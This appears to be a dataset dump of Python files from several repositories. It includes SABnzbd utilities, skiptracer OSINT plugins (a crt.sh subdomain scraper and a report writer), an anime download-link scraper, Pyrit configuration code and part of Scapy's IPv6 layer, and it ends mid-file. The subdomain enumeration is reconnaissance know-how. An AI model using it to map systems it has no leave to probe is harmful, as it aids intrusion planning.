metadata (dict) | text (string, lengths 60 – 3.49M)
---|---
{
"source": "84KaliPleXon3/sabnzbd",
"score": 3
} |
#### File: sabnzbd/utils/getperformance.py
```python
import platform
import subprocess
def getcpu():
# find the CPU name (which needs a different method per OS), and return it
# If none found, return platform.platform().
cputype = None
try:
if platform.system() == "Windows":
import _winreg as winreg # needed on Python 2
key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"Hardware\Description\System\CentralProcessor\0")
cputype = winreg.QueryValueEx(key, "ProcessorNameString")[0]
winreg.CloseKey(key)
elif platform.system() == "Darwin":
cputype = subprocess.check_output(['sysctl', "-n", "machdep.cpu.brand_string"]).strip()
elif platform.system() == "Linux":
for myline in open("/proc/cpuinfo"):
if myline.startswith('model name'):
# Typical line:
# model name : Intel(R) Xeon(R) CPU E5335 @ 2.00GHz
cputype = myline.split(":", 1)[1] # get everything after the first ":"
break # we're done
except:
# An exception, maybe due to a subprocess call gone wrong
pass
if cputype:
# OK, found. Remove unneeded spaces:
cputype = " ".join(cputype.split())
else:
# Not found, so let's fall back to platform()
cputype = platform.platform()
return cputype
def getpystone():
# Iteratively find the pystone performance of the CPU
# Prefers using Python's standard pystones library, otherwise SABnzbd's pystones library
try:
# Try to import from the python standard library
from test.pystone import pystones
except:
try:
# fallback: try to import from SABnzbd's library
from pystone import pystones
except:
return None # no pystone library found
# if we arrive here, we were able to successfully import pystone, so start the calculation
maxpystone = None
# Start with a short run, find the pystone value, and increase the runtime until the duration exceeds 0.1 second
for pyseed in [1000, 2000, 5000, 10000, 20000, 50000, 100000, 200000]:
duration, pystonefloat = pystones(pyseed)
maxpystone = max(maxpystone, int(pystonefloat))
# Stop when pystone() has been running for at least 0.1 second
if duration > 0.1:
break
return maxpystone
if __name__ == '__main__':
print getpystone()
print getcpu()
```
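A minimal usage sketch of the two helpers above; the import path follows the file header (and is otherwise an assumption), and `getpystone()` returns `None` when no pystone library can be imported:
```python
# Usage sketch (assumes the module is importable under the path in the file header).
from sabnzbd.utils.getperformance import getcpu, getpystone

print("CPU  : %s" % getcpu())               # e.g. "Intel(R) Xeon(R) CPU E5335 @ 2.00GHz"
print("Speed: %s pystones" % getpystone())  # None if neither pystone library was found
```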
#### File: sabnzbd/utils/pathbrowser.py
```python
import os
if os.name == 'nt':
import win32api, win32con, win32file
MASK = win32con.FILE_ATTRIBUTE_DIRECTORY | win32con.FILE_ATTRIBUTE_HIDDEN
TMASK = win32con.FILE_ATTRIBUTE_DIRECTORY
DRIVES = (2, 3, 4) # DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_REMOTE
NT = True
else:
NT = False
import sabnzbd
_JUNKFOLDERS = (
'boot', 'bootmgr', 'cache', 'msocache', 'recovery', '$recycle.bin', 'recycler',
'system volume information', 'temporary internet files', # windows specific
'.fseventd', '.spotlight', '.trashes', '.vol', 'cachedmessages', 'caches', 'trash' # osx specific
)
# this is for the drive letter code, it only works on windows
if os.name == 'nt':
from ctypes import windll
# adapted from http://stackoverflow.com/questions/827371/is-there-a-way-to-list-all-the-available-drive-letters-in-python/827490
def get_win_drives():
""" Return list of detected drives """
assert NT
drives = []
bitmask = windll.kernel32.GetLogicalDrives()
for letter in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
if (bitmask & 1) and win32file.GetDriveType('%s:\\' % letter) in DRIVES:
drives.append(letter)
bitmask >>= 1
return drives
def folders_at_path(path, include_parent = False, show_hidden = False):
""" Returns a list of dictionaries with the folders contained at the given path
Give the empty string as the path to list the contents of the root path
(under Unix this means "/", on Windows this will be a list of drive letters)
"""
from sabnzbd.encoding import unicoder
if path == "":
if NT:
entries = [{'name': letter + ':\\', 'path': letter + ':\\'} for letter in get_win_drives()]
entries.insert(0, {'current_path': 'Root'})
return entries
else:
path = '/'
# walk up the tree until we find a valid path
path = sabnzbd.misc.real_path(sabnzbd.DIR_HOME, path)
while path and not os.path.isdir(path):
if path == os.path.dirname(path):
return folders_at_path('', include_parent)
else:
path = os.path.dirname(path)
# fix up the path and find the parent
path = os.path.abspath(os.path.normpath(path))
parent_path = os.path.dirname(path)
# if we're at the root then the next step is the meta-node showing our drive letters
if path == parent_path and os.name == 'nt':
parent_path = ""
file_list = []
try:
for filename in os.listdir(path):
fpath = os.path.join(path, filename)
try:
if NT:
doit = (win32api.GetFileAttributes(fpath) & MASK) == TMASK and filename != 'PerfLogs'
elif not show_hidden:
doit = not filename.startswith('.')
else:
doit = True
except:
doit = False
if doit:
file_list.append({ 'name': unicoder(filename), 'path': unicoder(fpath) })
file_list = filter(lambda entry: os.path.isdir(entry['path']), file_list)
file_list = filter(lambda entry: entry['name'].lower() not in _JUNKFOLDERS, file_list)
file_list = sorted(file_list, lambda x, y: cmp(os.path.basename(x['name']).lower(), os.path.basename(y['name']).lower()))
except:
# No access, ignore
pass
file_list.insert(0, {'current_path': path})
if include_parent and parent_path != path:
file_list.insert(1,{ 'name': "..", 'path': parent_path })
return file_list
```
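For readers without the SABnzbd tree at hand, here is a stripped-down, dependency-free sketch of the same idea (list only sub-directories, skip hidden entries and junk folders); it is an illustration, not the SABnzbd implementation:
```python
# Simplified sketch of folders_at_path(): list sub-directories only,
# skipping hidden entries and a small junk-folder blacklist.
import os

JUNK = {'$recycle.bin', 'recycler', 'system volume information', '.trashes', 'caches'}

def list_folders(path, show_hidden=False):
    entries = []
    for name in sorted(os.listdir(path), key=lambda n: n.lower()):
        full = os.path.join(path, name)
        if not os.path.isdir(full):
            continue                      # files are never listed
        if not show_hidden and name.startswith('.'):
            continue                      # hidden on Unix/macOS
        if name.lower() in JUNK:
            continue
        entries.append({'name': name, 'path': full})
    return entries
```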
#### File: sabnzbd/utils/rsslib.py
```python
import xml.sax.saxutils
#------------------------------------------------------------------------------
def encode_for_xml(unicode_data, encoding='ascii'):
"""
Encode unicode_data for use as XML or HTML, with characters outside
of the encoding converted to XML numeric character references.
"""
try:
return unicode_data.encode(encoding, 'xmlcharrefreplace')
except ValueError:
# ValueError is raised if there are unencodable chars in the
# data and the 'xmlcharrefreplace' error handler is not found.
# Pre-2.3 Python doesn't support the 'xmlcharrefreplace' error
# handler, so we'll emulate it.
return _xmlcharref_encode(unicode_data, encoding)
def _xmlcharref_encode(unicode_data, encoding):
"""Emulate Python 2.3's 'xmlcharrefreplace' encoding error handler."""
chars = []
# Step through the unicode_data string one character at a time in
# order to catch unencodable characters:
for char in unicode_data:
try:
chars.append(char.encode(encoding, 'strict'))
except UnicodeError:
chars.append('&#%i;' % ord(char))
return ''.join(chars)
class RSS:
# """
# RSS
#
# This class encapsulates the creation of an RSS 2.0 feed
#
# The RSS2.0 spec can be found here:
# http://blogs.law.harvard.edu/tech/rss
#
#
# RSS validator : http://rss.scripting.com
#
#
# The generation of an RSS feed is simple, the following is a
# sample:
# from rsslib import RSS, Item, Namespace
# rss = RSS()
# rss.channel.link = "http://channel.com"
# rss.channel.title = "my channel title"
# rss.channel.description = "my channel description"
#
# ns = Namespace( "foobar", "http://foobar.baz" )
# rss.channel.namespaces.append( ns )
#
# item = Item()
# item.link = "http://link.com"
# item.description = "my link description"
# item.title ="my item title"
# item.nsItems[ns.name + ":foo"] = "bar"
# rss.channel.items.append( item )
#
# item = Item()
# item.link = "http://link2.com"
# item.description = "my link2 description"
# item.title ="my item2 title"
# item.nsItems[ns.name +":foo"] = "foo bar baz"
# rss.channel.items.append( item )
#
# print rss.write()
#
# output:
# <?xml version="1.0" encoding="UTF-8"?>
# <rss version="2.0" xmlns:foobar=http://foobar.baz >
# <channel>
# <title>my channel title</title>
# <link>http://channel.com</link>
# <description>my channel description</description>
#
# <item><title>my item title</title>
# <link>http://link.com</link>
# <description>my link description</description>
# <foobar:foo>bar</foobar:foo>
# </item>
#
# <item><title>my item2 title</title>
# <link>http://link2.com</link>
# <description>my link2 description</description>
# <foobar:foo>foo bar baz</foobar:foo>
# </item>
#
# </channel>
# </rss>
#
# author: cmallory /a t/ berserk /dot/ o r g
# """
def __init__(self):
self.channel = Channel()
self.version = "2.0"
self.contents = None
# if __name__ == "__main__" :
# from rsslib import RSS, Item, Namespace
# rss = RSS()
# rss.channel.link = "http://channel.com"
# rss.channel.title = "my channel title"
# rss.channel.description = "my channel description"
#
# ns = Namespace( "foobar", "http://foobar.baz" )
# rss.addNamespace( ns )
#
# item = Item()
# item.link = "http://link.com"
# item.description = "my link description"
# item.title ="my item title"
#
# item.enclosure.url = "http://enclosure.url.com"
# item.enclosure.length = 12345
# item.enclosure.type = "audio/mpeg"
#
# item.nsItems[ns.name + ":foo"] = "bar"
# rss.addItem( item )
#
# item = Item()
# item.link = "http://link2.com"
# item.description = "my link2 description"
# item.title ="my item2 title"
# item.nsItems[ns.name +":foo"] = "foo bar baz"
# rss.addItem( item )
#
# print rss.write()
#Write out the rss document
def write( self ):
self.contents = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
#contents += "<!--\n Last " + cnt + " urls to be shrunk \n-->\n"
self.contents += "<rss version=\"" + self.version + "\" "
if ( self.channel is not None and self.channel.namespaces is not None ):
for ns in self.channel.namespaces :
self.contents += "xmlns:" + ns.name + "=\"" + ns.url + "\" "
self.contents += ">\n"
self.contents += self.generateChannel()
self.contents += "</rss>\n";
return self.contents
#Generates everything contained in a <channel> element
def generateChannel( self ):
contents = ""
if ( self.channel.initialized() ):
contents += "<channel>\n"
contents += self.optionalWrite("title", self.channel.title );
contents += self.optionalWrite("link", self.channel.link );
contents += self.optionalWrite("description", self.channel.description );
contents += self.optionalWrite("language", self.channel.language );
contents += self.optionalWrite("copyright", self.channel.copyright );
contents += self.optionalWrite("category", self.channel.category );
contents += self.optionalWrite("managingEditor", self.channel.managingEditor );
contents += self.optionalWrite("webMaster", self.channel.webMaster );
contents += self.optionalWrite("pubDate", self.channel.pubDate );
contents += self.optionalWrite("lastBuildDate", self.channel.lastBuildDate );
contents += self.optionalWrite("docs", self.channel.docs );
contents += self.optionalWrite("cloud", self.channel.cloud );
contents += self.optionalWrite("ttl", self.channel.ttl );
contents += self.optionalWrite("generator", self.channel.generator );
contents += self.optionalWrite("image", self.channel.image );
contents += self.optionalWrite("rating", self.channel.rating );
contents += self.optionalWrite("textInput", self.channel.textInput );
contents += self.optionalWrite("skipHours", self.channel.skipHours );
contents += self.optionalWrite("skipDays", self.channel.skipDays );
contents += "\n" + self.generateItems() + "</channel>\n"
else :
contents = "[Channel not properly initialized. "
contents +="A required field is not set.(title/link/description]"
return contents
#Generates all items within a channel
def generateItems( self ):
c = ""
for i in self.channel.items :
c += "<item>"
c += self.optionalWrite("title", i.title);
c += self.optionalWrite("link", i.link );
c += self.optionalWrite("description", i.description);
c += self.optionalWrite("author", i.author );
c += self.optionalWrite("pubDate", str(i.pubDate) )
c += self.optionalWrite("category", i.category )
c += self.optionalWrite("comments", i.comments )
c += self.optionalWrite("guid", i.guid )
c += self.optionalWrite("source", i.source )
if ( i.enclosure.url != "" ):
c+= "<enclosure url=\"" + i.enclosure.url + "\" "
c+= "length=\"" + str(i.enclosure.length )+ "\" "
c+= "type=\"" + i.enclosure.type + "\"/>\n"
for k in i.nsItems.keys():
c += self.optionalWrite( k , i.nsItems[ k ] )
c += "</item>\n\n"
return c
def addNamespace( self, ns ):
if ( self.channel.namespaces is not None ):
self.channel.namespaces.append( ns )
def addItem( self, item ):
if ( self.channel is not None):
self.channel.items.append( item )
def optionalWrite( self, key, val ):
if ( val is not None and val != "" ):
return "<" + key + ">" + encode_for_xml(xml.sax.saxutils.escape(val)) + "</" + key + ">\n"
else:
return ""
#Namespace
class Namespace:
def __init__( self, name, url ):
self.url = url
self.name = name
class Channel:
# """
# Channel
#
# (http://blogs.law.harvard.edu/tech/rss)
#
# This object represents an RSS channel (as of ver2.0)
# """
def __init__( self ):
#
# Required Fields
#
self.title= None
self.link= None
self.description= None
#
# Optional Fields
#
self.language = ""
self.copyright = ""
self.managingEditor = ""
self.webMaster = ""
self.pubDate = ""
self.lastBuildDate = ""
self.category = ""
self.generator = ""
self.docs = ""
self.cloud = ""
self.ttl = ""
self.image = ""
self.rating = ""
self.textInput = ""
self.skipHours = ""
self.skipDays = ""
self.items = []
self.namespaces = []
def initialized( self ):
return self.title is not None and self.link is not None and self.description is not None
class Item:
# """
# Item
#
# http://blogs.law.harvard.edu/tech/rss#hrelementsOfLtitemgt
#
# A channel may contain any number of <item>s. An item may
# represent a "story" -- much like a story in a newspaper or magazine;
# if so its description is a synopsis of the story, and the link
# points to the full story. An item may also be complete in itself,
# if so, the description contains the text (entity-encoded HTML is
# allowed; see examples), and the link and title may be omitted.
# All elements of an item are optional, however at least one of
# title or description must be present.
# """
def __init__( self ):
self.title = ""
self.link = ""
self.description = ""
self.author = ""
self.category = ""
self.comments = ""
self.enclosure = ""
self.guid = ""
self.pubDate = ""
self.source = ""
self.enclosure = Enclosure()
self.nsItems = {}
class Enclosure:
# """
# Enclosure
#
# <enclosure> sub-element of <item>
#
# <enclosure> is an optional sub-element of <item>.
#
# It has three required attributes:
#
# url: says where the enclosure is located,
# length: says how big it is in bytes, and
# type: says what its type is, a standard MIME type.
#
# The url must be an http url.
#
# Example: <enclosure url="http://www.scripting.com/mp3s/weatherReportSuite.mp3" length="12216320" type="audio/mpeg" />
#
# """
def __init__(self):
self.url = ""
self.length = 0
self.type = ""
```
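The commented-out sample in the `RSS` docstring maps directly onto the API above; a short sketch (URLs and titles are placeholders, and like the module itself this is Python 2 era code):
```python
# Usage sketch, following the commented-out sample in the RSS docstring.
rss = RSS()
rss.channel.link = "http://channel.com"
rss.channel.title = "my channel title"
rss.channel.description = "my channel description"

item = Item()
item.link = "http://link.com"
item.title = "my item title"
item.description = "my link description"
rss.addItem(item)

print(rss.write())   # emits the <?xml ...?><rss version="2.0">...</rss> document
```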
#### File: sabnzbd/util/apireg.py
```python
import _winreg
def reg_info(user):
""" Return the reg key for API """
if user:
# Normally use the USER part of the registry
section = _winreg.HKEY_CURRENT_USER
keypath = r"Software\SABnzbd"
else:
# A Windows Service will use the service key instead
section = _winreg.HKEY_LOCAL_MACHINE
keypath = r"SYSTEM\CurrentControlSet\Services\SABnzbd"
return section, keypath
def get_connection_info(user=True):
""" Return URL of the API running SABnzbd instance
'user' == True will first try user's registry, otherwise system is used
"""
section, keypath = reg_info(user)
url = None
try:
hive = _winreg.ConnectRegistry(None, section)
key = _winreg.OpenKey(hive, keypath + r'\api')
for i in range(0, _winreg.QueryInfoKey(key)[1]):
name, value, val_type = _winreg.EnumValue(key, i)
if name == 'url':
url = value
_winreg.CloseKey(key)
except WindowsError:
pass
finally:
_winreg.CloseKey(hive)
# Nothing in user's registry, try system registry
if user and not url:
url = get_connection_info(user=False)
return url
def set_connection_info(url, user=True):
""" Set API info in register """
section, keypath = reg_info(user)
try:
hive = _winreg.ConnectRegistry(None, section)
try:
_winreg.CreateKey(hive, keypath)
except:
pass
key = _winreg.OpenKey(hive, keypath)
mykey = _winreg.CreateKey(key, 'api')
_winreg.SetValueEx(mykey, 'url', None, _winreg.REG_SZ, url)
_winreg.CloseKey(mykey)
_winreg.CloseKey(key)
except WindowsError:
if user:
set_connection_info(url, user=False)
finally:
_winreg.CloseKey(hive)
def del_connection_info(user=True):
""" Remove API info from register """
section, keypath = reg_info(user)
try:
hive = _winreg.ConnectRegistry(None, section)
key = _winreg.OpenKey(hive, keypath)
_winreg.DeleteKey(key, 'api')
_winreg.CloseKey(key)
except WindowsError:
if user:
del_connection_info(user=False)
finally:
_winreg.CloseKey(hive)
def get_install_lng():
""" Return language-code used by the installer """
lng = 0
try:
hive = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
key = _winreg.OpenKey(hive, r"Software\SABnzbd")
for i in range(0, _winreg.QueryInfoKey(key)[1]):
name, value, val_type = _winreg.EnumValue(key, i)
if name == 'Installer Language':
lng = value
_winreg.CloseKey(key)
except WindowsError:
pass
finally:
_winreg.CloseKey(hive)
if lng in LanguageMap:
return LanguageMap[lng]
return 'en'
# Map from NSIS-codepage to our language-strings
LanguageMap = {
'1033': 'en',
'1036': 'fr',
'1031': 'de',
'1043': 'nl',
'1035': 'fi',
'1045': 'pl',
'1053': 'sv',
'1030': 'da',
'2068': 'nb',
'1048': 'ro',
'1034': 'es',
'1046': 'pr_BR',
'3098': 'sr',
'1037': 'he',
'1049': 'ru',
'2052': 'zh_CN'
}
if __name__ == '__main__':
print 'URL = %s' % get_connection_info()
print 'Language = %s' % get_install_lng()
# del_connection_info()
# set_connection_info('localhost', '8080', 'blabla', user=False)
``` |
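On Python 3 the same registry access goes through `winreg` instead of `_winreg`; a minimal sketch of the read side (key path and value name taken from `reg_info()` and `set_connection_info()` above, Windows only):
```python
# Python 3 sketch: read back the value that set_connection_info() stores.
import winreg

def read_api_url():
    try:
        key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\SABnzbd\api")
        url, _ = winreg.QueryValueEx(key, "url")
        winreg.CloseKey(key)
        return url
    except OSError:          # key or value not present
        return None
```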
{
"source": "84KaliPleXon3/skiptracer",
"score": 2
} |
#### File: skiptracer/plugins/crt.py
```python
from __future__ import absolute_import, print_function
import re
from plugins.base import PageGrabber
from .colors import BodyColors as bc
try:
import __builtin__ as bi
except ImportError:
import builtins as bi
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
import json
import requests
class SubDomainGrabber(PageGrabber): # crt.sh scraper for abusing Certificate Transparency log lookups
def get_info(self, domain): # returns information about a domain's subdomains
print("["+bc.CPRP+"?"+bc.CEND+"] "+bc.CCYN + "crt.sh " + bc.CEND)
domain2 = domain.split("//")[-1].split("/")[0].split('?')[0] #strip the input to just the domain name and TLD only
req = requests.get("https://crt.sh/?q=%.{}&output=json".format(domain2))
if req.status_code != 200:
print(" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No results were found ...\n"+bc.CEND)
exit(1)
jsondata = json.loads('[{}]'.format(req.text.replace('}{', '},{')))
subdomainlist = []
for (key,value) in enumerate(jsondata):
subdomainlist.append(value['name_value'])
subdomainlist = sorted(set(subdomainlist))
for subdomain in subdomainlist:
if not (re.search("^\*\.", subdomain)):
print("["+bc.CGRN+"+"+bc.CEND+"] "+bc.CRED+"Subdomain: "+bc.CEND+"{}".format(subdomain))
self.info_dict.update({
"subdomain": subdomain
})
bi.outdata['crt'] = self.info_dict
if len(self.info_dict) == 0:
print (" ["+bc.CRED+"X"+bc.CEND+"] "+bc.CYLW+"No source returned, try again later ...\n"+bc.CEND)
return
else:
print()
return
```
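The crt.sh lookup itself does not depend on the plugin framework; a stand-alone sketch of the same request and JSON handling (wildcard query and `name_value` field as used above):
```python
# Stand-alone sketch of the crt.sh Certificate Transparency lookup.
import json
import requests

def crtsh_subdomains(domain):
    r = requests.get("https://crt.sh/?q=%.{}&output=json".format(domain))
    if r.status_code != 200:
        return []
    # Older crt.sh responses were concatenated JSON objects, hence the '}{' patch-up.
    data = json.loads('[{}]'.format(r.text.replace('}{', '},{')))
    return sorted({entry['name_value'] for entry in data})
```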
#### File: skiptracer/plugins/reporter.py
```python
from docx import Document
from docx.shared import Inches
import __builtin__ as bi
class ReportGenerator:
def __init__(self):
pass
def newdoc(self):
bi.document = Document()
def addtitle(self, title):
bi.document.add_heading(title, 0)
def writepara(self, paragraph):
bi.document.add_paragraph(paragraph)
def addheader(self, header, level):
bi.document.add_heading(header, level=level)
def addquote(self, quote):
bi.document.add_paragraph(quote, style='Intense Quote')
def unorderedlist(self, data):
bi.document.add_paragraph(data, style='List Bullet')
def unorderedlevel(self, data):
bi.document.add_paragraph(data, style='List Bullet 2')
def orderedlist(self, data):
bi.document.add_paragraph(data, style='List Number')
def addimg(self, imglocation):
bi.document.add_picture(imglocation) #, width=Inches(1.25))
def addtable(self, data, rows, cols):
table = bi.document.add_table(rows=rows, cols=cols)
hdr_cells = table.rows[0].cells
hdr_cells[0].text = 'Qty'
hdr_cells[1].text = 'Id'
hdr_cells[2].text = 'Desc'
for qty, id, desc in data:  # 'data' is expected to be an iterable of (qty, id, desc) tuples
row_cells = table.add_row().cells
row_cells[0].text = str(qty)
row_cells[1].text = id
row_cells[2].text = desc
def addlinebrk(self):
bi.document.add_page_break()
def savefile(self, filename):
bi.document.save(filename)
``` |
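A short usage sketch of `ReportGenerator` (requires `python-docx`; the filename is a placeholder):
```python
# Usage sketch for ReportGenerator.
rg = ReportGenerator()
rg.newdoc()                             # creates the shared bi.document
rg.addtitle('Skiptracer report')
rg.addheader('Findings', level=1)
rg.writepara('Collected results go here.')
rg.unorderedlist('first finding')
rg.savefile('report.docx')              # placeholder filename
```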
{
"source": "84KaliPleXon3/Smhdk",
"score": 3
} |
#### File: 84KaliPleXon3/Smhdk/samehadaku.py
```python
import requests
import re
import base64
class Samehadaku:
def __init__(self, q):
self.url = 'https://www.samehadaku.tv/'
self.links = []
self.title = None
self.cache = {}
self.href = None
self.rlinks = []
q = q + ' episode subtitle indonesia'
r = requests.get(self.url, params={'s': q})
results = re.findall(
'<h3 class="post-title"><a href="(.+?)" ' +
'title="(.+?)">.+</a></h3>',
r.text, re.M | re.I)
fail_indicator = 'Sorry, but nothing matched your search terms.'
if len(results) and fail_indicator not in r.text:
self.href = results[0][0]
self.title = results[0][1]
def _fetch(self, u):
if not u.startswith(self.url):
return False
page = requests.get(u)
links = re.findall(
r'<li.*<a.*?href="(.+?)".*?>MU.*?</a>.*?</li>',
page.text, re.M | re.I)
self.links = links
self.page_text = page.text
return True
def get_links(self):
if not self.href or (self._fetch(self.href) and not self.links):
return False
def clean_type(raw_html):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html).lower()
hf_types_pr = ['3gp', 'x265', 'mp4', 'mkv']
for t in hf_types_pr:
if t in cleantext:
return t
return cleantext.strip()
vtypes = re.findall('^(<p.+?)\n.*?download-eps',
self.page_text, re.M | re.I)
sections = {}
for i, v in enumerate(vtypes):
if i+1 != len(vtypes):
sections[clean_type(v)] = self.page_text[self.page_text.find(
v):self.page_text.find(vtypes[i+1]):]
else:
sections[clean_type(
v)] = self.page_text[self.page_text.find(v):]
rlinks = []
for link in self.links: # iterate over links
for vtype, text in sections.items(): # check for section
if link in text:
vquals = re.findall(
r'<li.*?>.*?<strong>(.+?)<', text, re.M | re.I)
for i, vqual in enumerate(vquals):
if i+1 != len(vquals):
if link in text[text.find(vqual):text.find(
vquals[i+1]):]:
break
elif link in text[text.find(vqual):]:
break
break
else:
continue
if (link and vtype and vqual):
rlinks.append(
{'link': link,
'type': vtype.lower(), 'quality': vqual.lower()})
self.rlinks = rlinks
if __name__ == '__main__':
s = Samehadaku('boruto')
s.get_links()
print(s.rlinks)
``` |
{
"source": "84KaliPleXon3/sslstrip-hsts-openwrt",
"score": 2
} |
#### File: site-packages/cpyrit/config.py
```python
from __future__ import with_statement
import os
import sys
def default_config():
config = {'default_storage': 'file://', \
'rpc_server': 'false', \
'rpc_announce': 'true', \
'rpc_announce_broadcast': 'false', \
'rpc_knownclients': '', \
'workunit_size': '75000', \
'limit_ncpus': 0}
return config
def read_configfile(filename):
config = default_config()
with open(filename, 'rb') as f:
for line in f:
if line.startswith('#') or '=' not in line:
continue
option, value = map(str.strip, line.split('=', 1))
if option in config:
config[option] = value
else:
print >> sys.stderr, "WARNING: Unknown option '%s' " \
"in configfile '%s'" % (option, filename)
return config
def write_configfile(config, filename):
with open(filename, 'wb') as f:
for option, value in sorted(config.items()):
f.write("%s = %s\n" % (option, value))
configpath = os.path.expanduser(os.path.join('~', '.pyrit'))
default_configfile = os.path.join(configpath, 'config')
if os.path.exists(default_configfile):
cfg = read_configfile(default_configfile)
else:
cfg = default_config()
if not os.path.exists(configpath):
os.makedirs(configpath)
write_configfile(cfg, default_configfile)
```
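A small round-trip sketch with the helpers above; the file lives at the `~/.pyrit/config` path computed at import time and holds plain `option = value` lines:
```python
# Round-trip sketch: adjust one option and write the file back.
cfg = read_configfile(default_configfile)
cfg['workunit_size'] = '50000'
write_configfile(cfg, default_configfile)
```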
#### File: scapy/layers/inet6.py
```python
import socket
if not socket.has_ipv6:
raise socket.error("can't use AF_INET6, IPv6 is disabled")
if not hasattr(socket, "IPPROTO_IPV6"):
# Workaround for http://bugs.python.org/issue6926
socket.IPPROTO_IPV6 = 41
from scapy.config import conf
from scapy.layers.l2 import *
from scapy.layers.inet import *
from scapy.fields import *
from scapy.packet import *
from scapy.volatile import *
from scapy.sendrecv import sr,sr1,srp1
from scapy.as_resolvers import AS_resolver_riswhois
from scapy.supersocket import SuperSocket,L3RawSocket
from scapy.arch import *
from scapy.utils6 import *
#############################################################################
# Helpers ##
#############################################################################
def get_cls(name, fallback_cls):
return globals().get(name, fallback_cls)
##########################
## Neighbor cache stuff ##
##########################
conf.netcache.new_cache("in6_neighbor", 120)
def neighsol(addr, src, iface, timeout=1, chainCC=0):
"""
Sends an ICMPv6 Neighbor Solicitation message to get the MAC address
of the neighbor with specified IPv6 address addr. 'src' address is
used as source of the message. Message is sent on iface. By default,
timeout waiting for an answer is 1 second.
If no answer is gathered, None is returned. Else, the answer is
returned (ethernet frame).
"""
nsma = in6_getnsma(inet_pton(socket.AF_INET6, addr))
d = inet_ntop(socket.AF_INET6, nsma)
dm = in6_getnsmac(nsma)
p = Ether(dst=dm)/IPv6(dst=d, src=src, hlim=255)
p /= ICMPv6ND_NS(tgt=addr)
p /= ICMPv6NDOptSrcLLAddr(lladdr=get_if_hwaddr(iface))
res = srp1(p,type=ETH_P_IPV6, iface=iface, timeout=1, verbose=0,
chainCC=chainCC)
return res
def getmacbyip6(ip6, chainCC=0):
"""
Returns the mac address to be used for provided 'ip6' peer.
neighborCache.get() method is used on instantiated neighbor cache.
Resolution mechanism is described in associated doc string.
(chainCC parameter value ends up being passed to sending function
used to perform the resolution, if needed)
"""
if in6_ismaddr(ip6): # Multicast
mac = in6_getnsmac(inet_pton(socket.AF_INET6, ip6))
return mac
iff,a,nh = conf.route6.route(ip6, dev=conf.iface6)
if iff == LOOPBACK_NAME:
return "ff:ff:ff:ff:ff:ff"
if nh != '::':
ip6 = nh # Found next hop
mac = conf.netcache.in6_neighbor.get(ip6)
if mac:
return mac
res = neighsol(ip6, a, iff, chainCC=chainCC)
if res is not None:
if ICMPv6NDOptDstLLAddr in res:
mac = res[ICMPv6NDOptDstLLAddr].lladdr
else:
mac = res.src
conf.netcache.in6_neighbor[ip6] = mac
return mac
return None
#############################################################################
#############################################################################
### IPv6 addresses manipulation routines ###
#############################################################################
#############################################################################
class Net6(Gen): # syntax ex. fec0::/126
"""Generate a list of IPv6s from a network address or a name"""
name = "ipv6"
ipaddress = re.compile(r"^([a-fA-F0-9:]+)(/[1]?[0-3]?[0-9])?$")
def __init__(self, net):
self.repr = net
tmp = net.split('/')+["128"]
if not self.ipaddress.match(net):
tmp[0]=socket.getaddrinfo(tmp[0], None, socket.AF_INET6)[0][-1][0]
netmask = int(tmp[1])
self.net = inet_pton(socket.AF_INET6, tmp[0])
self.mask = in6_cidr2mask(netmask)
self.plen = netmask
def __iter__(self):
def m8(i):
if i % 8 == 0:
return i
tuple = filter(lambda x: m8(x), xrange(8, 129))
a = in6_and(self.net, self.mask)
tmp = map(lambda x: x, struct.unpack('16B', a))
def parse_digit(a, netmask):
netmask = min(8,max(netmask,0))
a = (int(a) & (0xffL<<netmask),(int(a) | (0xffL>>(8-netmask)))+1)
return a
self.parsed = map(lambda x,y: parse_digit(x,y), tmp, map(lambda x,nm=self.plen: x-nm, tuple))
def rec(n, l):
if n and n % 2 == 0:
sep = ':'
else:
sep = ''
if n == 16:
return l
else:
ll = []
for i in xrange(*self.parsed[n]):
for y in l:
ll += [y+sep+'%.2x'%i]
return rec(n+1, ll)
return iter(rec(0, ['']))
def __repr__(self):
return "<Net6 %s>" % self.repr
#############################################################################
#############################################################################
### IPv6 Class ###
#############################################################################
#############################################################################
class IP6Field(Field):
def __init__(self, name, default):
Field.__init__(self, name, default, "16s")
def h2i(self, pkt, x):
if type(x) is str:
try:
x = in6_ptop(x)
except socket.error:
x = Net6(x)
elif type(x) is list:
x = map(Net6, x)
return x
def i2m(self, pkt, x):
return inet_pton(socket.AF_INET6, x)
def m2i(self, pkt, x):
return inet_ntop(socket.AF_INET6, x)
def any2i(self, pkt, x):
return self.h2i(pkt,x)
def i2repr(self, pkt, x):
if x is None:
return self.i2h(pkt,x)
elif not isinstance(x, Net6) and not type(x) is list:
if in6_isaddrTeredo(x): # print Teredo info
server, flag, maddr, mport = teredoAddrExtractInfo(x)
return "%s [Teredo srv: %s cli: %s:%s]" % (self.i2h(pkt, x), server, maddr,mport)
elif in6_isaddr6to4(x): # print encapsulated address
vaddr = in6_6to4ExtractAddr(x)
return "%s [6to4 GW: %s]" % (self.i2h(pkt, x), vaddr)
return self.i2h(pkt, x) # No specific information to return
def randval(self):
return RandIP6()
class SourceIP6Field(IP6Field):
def __init__(self, name, dstname):
IP6Field.__init__(self, name, None)
self.dstname = dstname
def i2m(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2m(self, pkt, x)
def i2h(self, pkt, x):
if x is None:
dst=getattr(pkt,self.dstname)
if isinstance(dst,Gen):
r = map(conf.route6.route, dst)
r.sort()
if r[0] == r[-1]:
x=r[0][1]
else:
warning("More than one possible route for %s"%repr(dst))
return None
else:
iff,x,nh = conf.route6.route(dst)
return IP6Field.i2h(self, pkt, x)
ipv6nh = { 0:"Hop-by-Hop Option Header",
4:"IP",
6:"TCP",
17:"UDP",
41:"IPv6",
43:"Routing Header",
44:"Fragment Header",
47:"GRE",
50:"ESP Header",
51:"AH Header",
58:"ICMPv6",
59:"No Next Header",
60:"Destination Option Header",
135:"Mobility Header"}
ipv6nhcls = { 0: "IPv6ExtHdrHopByHop",
4: "IP",
